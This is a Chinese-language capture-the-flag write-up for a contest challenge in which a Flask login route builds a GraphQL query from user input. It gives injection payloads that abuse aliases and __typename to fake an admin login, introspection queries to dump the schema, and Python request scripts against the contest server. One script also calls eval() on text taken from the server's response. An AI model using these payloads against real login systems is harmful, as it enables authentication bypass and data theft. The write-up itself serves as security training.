# 统一身份认证

本题又名GraphQL的入门与精通。

### Flag1

观察app.py源码，我们能看出这是一个非常经典的注入：

```python
@app.route("/login", methods=["POST"])
def login():
    clear_session()
    username = request.form.get("username", "").strip()
    password = request.form.get("password", "")
    if not validate(username, password):
        return redirect(url_for("index"))
    log("login:username", username)
    log("login:password", password)
    query = f'''
    query ($username: String = "{username}", $password: String = "{password}") {{
      login(username: $username, password: $password) {{
        ok
        isAdmin
        username
      }}
    }}
    '''
```

需要我们构造输入，使得断点返回的isAdmin为Truthy（不一定是True，可以是任意非空字符串）。实际上Flag1的大多数时间都在大战GraphQL语法（本题万恶的没有回显，需要找一个[GraphQL在线验证器](https://www.leskoff.com/s01928-0)来看syntax错在哪）。构造一个非空字符串很简单，GraphQL有一些magic var（比如__typename返回当前类型的名称），我们很容易就能想到以下注入：

```graphql
p") {
  login(username: "u", password: "p") {
    ok: __typename
    isAdmin: ok
    username: __typename
  }
} #
```

但是GraphQL的语法限制导致：
- 我们不能构造另一个query，因为一个查询只允许一个匿名query；
- 我们构造的值必须叫login，而GraphQL不能出现两个相同的字段。

可以活用[GraphQL别名](https://graphql.cn/learn/queries/#aliases)功能，进行一个字段的重命名。最后注入的payload如下：

```graphql
p") {
  login(username: "u", password: "p") {
    ok: __typename
    isAdmin: ok
    username: __typename
  }
  x:
#
```

注入完的Query长这样：

```graphql
query ($username: String = "u", $password: String = "p") {
    login(username: $username, password: $password) {
        ok: __typename
        isAdmin: ok
        username: __typename
    }
x:
#") {
    login(username: $username, password: $password) {
        ok
        isAdmin
        username
    }
}

### Flag2

Flag2要求我们dump出GraphQL的Schema，实际上考察的是你知不知道[GraphQL的Introspection功能](https://graphql.org/learn/introspection/)。实际上我们可以构造特定的Payload，让某个查询的结果回显到Username。先拿到所有的类型名称和字段尝尝咸淡：

In [161]:
import requests

URL = "https://prob11-wc3g9fcv.geekgame.pku.edu.cn/login"
# URL = "http://localhost:5000/login"

def make_register_request(username: str, password: str) -> dict:
    resp = requests.post(
        URL,
        data={
            "username": username,
            "password": password,
        }
    )
    return resp.text

r = make_register_request("u", """p") {
  login: __schema {
    ok: __typename
    isAdmin: __typename
    username: types {
      name
      fields {
        name
        type: type {
          name
        }
      }
    }
  }
x: ##""")
print(r)

<!doctype html>
<html>

<head>
  <meta charset="utf-8">
  <title>华清大学用户电子身份服务系统</title>
  <link rel="stylesheet" href="https://unpkg.com/@picocss/pico@2/css/pico.min.css" crossorigin="anonymous">
</head>

<body>
  <header style="display: flex; justify-content: space-between; align-items: center; padding: 0 2rem; border-bottom: 1px solid;">
    <h1 style="font-size: 1.5rem; padding: 1rem 0; margin-bottom: 0;">
      <span>华清大学</span>
      <span style="margin-left: 1rem; font-family: Kaiti,STKaiti,楷体,华文楷体;">用户电子身份服务系统</span>
    </h1>
    
      <form method="post" action="/logout">
        <button type="submit" style="margin-bottom: 0; padding: 0.3rem 0.5rem;">退出</button>
      </form>
    
  </header>
  <main style="display: flex; justify-content: center;">
    <div>
      
        
      
      <div style="display: flex; justify-content: center; gap: 6rem; padding: 3rem; border: 2px solid; border-radius: 0.75rem; margin-top: 1rem; min-width: 60vw;">
        
          <section>
     

【马保国：我去！.mp4】这Schema也太离谱了。看题目附件能知道，我们还需要找到Secret类型到flag2之间的一条Path，才能写出正确的查询。

以下我们写个代码parse一下结果，然后把这条Path遍历出来：

In [ ]:
line_to_process = r.splitlines()[32].strip()
line_to_process = line_to_process[5:-6]
# decode the escaped characters like &#34; and &#39;
import html
line_to_process = html.unescape(line_to_process)
# eval the string to get a list
result = eval(line_to_process)
pprint(result)

_target = 'flag2'
names = []

for item in result:
    if not 'fields' in item:
        continue
    if not isinstance(item['fields'], list):
        continue
    for field in item['fields']:
        if not isinstance(field, dict):
            continue
        if not 'name' in field:
            continue
        if field['name'] == _target:
            print("Found target:", _target, item)
            names.append(field['name'])
            _target = item['name']
            break
        
_old_target = None

while _old_target != _target:
    _old_target = _target
    for item in result:
        if not 'fields' in item:
            continue
        if not isinstance(item['fields'], list):
            continue
        for field in item['fields']:
            if not isinstance(field, dict):
                continue
            if not 'name' in field:
                continue
            if field['type']['name'] == _target:
                print("Found target:", _target, item)
                names.append(field['name'])
                _target = item['name']
                break
        
names.reverse()
print(names)

[{'fields': [{'name': 'ok', 'type': {'name': None}},
             {'name': 'isAdmin', 'type': {'name': 'Boolean'}},
             {'name': 'username', 'type': {'name': 'String'}}],
  'name': 'User'},
 {'fields': None, 'name': 'Boolean'},
 {'fields': None, 'name': 'String'},
 {'fields': [{'name': 'ok', 'type': {'name': None}}], 'name': 'RegisterResult'},
 {'fields': [{'name': 'not_flag_bkht', 'type': {'name': 'Int'}},
             {'name': 'not_flag_SsDg', 'type': {'name': 'Boolean'}},
             {'name': 'not_flag_MyL3', 'type': {'name': 'Boolean'}},
             {'name': 'not_flag_jdPD', 'type': {'name': 'Int'}},
             {'name': 'not_flag_9SXP', 'type': {'name': 'Int'}}],
  'name': 'Secret_zY0Q'},
 {'fields': None, 'name': 'Int'},
 {'fields': [{'name': 'not_flag_21ZS', 'type': {'name': 'Int'}},
             {'name': 'not_flag_ujhQ', 'type': {'name': 'String'}},
             {'name': 'not_flag_HkGj', 'type': {'name': 'Float'}},
             {'name': 'not_flag_J2h6', 'type': {'na

好好好！接下来发个请求，让Flag2回显到Username：

In [ ]:
import requests

def make_register_request(username: str, password: str) -> dict:
    resp = requests.post(
        URL,
        data={
            "username": username,
            "password": password,
        }
    )
    return resp.text

r = make_register_request("u", """p") {
  login: secret { 
    ok: __typename
    isAdmin: __typename
    username: secret_nA4t { secret_sYtr { secret_62EG { secret_VU3H { secret_4OPY { secret_BDaS { secret_unrf { flag2 } } } } } } } 
  }
x: ##""")
print(r)

<!doctype html>
<html>

<head>
  <meta charset="utf-8">
  <title>华清大学用户电子身份服务系统</title>
  <link rel="stylesheet" href="https://unpkg.com/@picocss/pico@2/css/pico.min.css" crossorigin="anonymous">
</head>

<body>
  <header style="display: flex; justify-content: space-between; align-items: center; padding: 0 2rem; border-bottom: 1px solid;">
    <h1 style="font-size: 1.5rem; padding: 1rem 0; margin-bottom: 0;">
      <span>华清大学</span>
      <span style="margin-left: 1rem; font-family: Kaiti,STKaiti,楷体,华文楷体;">用户电子身份服务系统</span>
    </h1>
    
      <form method="post" action="/logout">
        <button type="submit" style="margin-bottom: 0; padding: 0.3rem 0.5rem;">退出</button>
      </form>
    
  </header>
  <main style="display: flex; justify-content: center;">
    <div>
      
        
      
      <div style="display: flex; justify-content: center; gap: 6rem; padding: 3rem; border: 2px solid; border-radius: 0.75rem; margin-top: 1rem; min-width: 60vw;">
        
          <section>
     